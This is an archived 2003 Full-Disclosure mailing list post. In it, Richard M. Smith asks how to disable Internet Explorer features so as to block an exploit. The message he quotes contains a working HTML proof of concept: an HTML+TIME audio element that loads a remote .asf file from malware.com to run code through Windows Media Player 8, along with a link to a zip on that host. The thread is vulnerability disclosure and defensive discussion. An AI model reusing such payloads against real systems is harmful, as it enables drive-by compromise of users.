[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code

To: <1@xxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxx>
Subject: RE: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code
From: "Richard M. Smith" <rms@xxxxxxxxxxxxxxxxxxxx>
Date: Fri, 12 Sep 2003 12:41:45 -0400

Do you have any suggestions of feature(s) that can be turned off in
Windows, Outlook, or Internet Explorer that will prevent this exploit
for working?  I'm mostly interested in some feature that wouldn't
typically be used on a Web page.   It's also not necessary for there to
be a UI to turn a feature on or off.  A hidden registry setting is fine.

Also, Internet Explorer has an option for turning off sounds in Web
pages.  If sounds are turned off in IE, will this exploit still work?

Thanks,
Richard

-----Original Message-----
From: full-disclosure-admin@xxxxxxxxxxxxxxxx
[mailto:full-disclosure-admin@xxxxxxxxxxxxxxxx] On Behalf Of
http-equiv@xxxxxxxxxx
Sent: Friday, September 12, 2003 11:56 AM
To: full-disclosure@xxxxxxxxxxxxxxxx
Cc: jkuperus@xxxxxxxxx
Subject: Re: [Full-Disclosure] Internet explorer 6 on windows XP allows
exection of arbitrary code


<!-- 

when viewing mail in recent versions of outlook it operates in the
restricted zone ,eg no active scripting allowed to run, so these wont 
be exploitable unless someone proofs otherwise that is ;)

 -->

<html xmlns:t>
<head><style>
t\:*{behavior:url(#default#time);display:none}</style></head><body>
<t:audio  t:src="http://www.malware.com/freek.asf";  />
</body></html>

Trivial inline url flip in the restricted zone. WMP 8 and under. 
Unpatched since May 2003 should do the trick:

http://www.malware.com/but.its.free.zip 

-- 
http://www.malware.com



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


#################################################################
#################################################################
#################################################################
#####
#####
#####
#################################################################
#################################################################
#################################################################

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

References:
- Re: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code
  - From: http-equiv@xxxxxxxxxx

Prev by Date: Re: [Full-Disclosure] Unwanted file download on Yahoo
Next by Date: [Full-Disclosure] oops - b62.inc
Previous by thread: Re: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code
Next by thread: RE: [Full-Disclosure] Internet explorer 6 on windows XP allows exection of arbitrary code
Index(es):
- Date
- Thread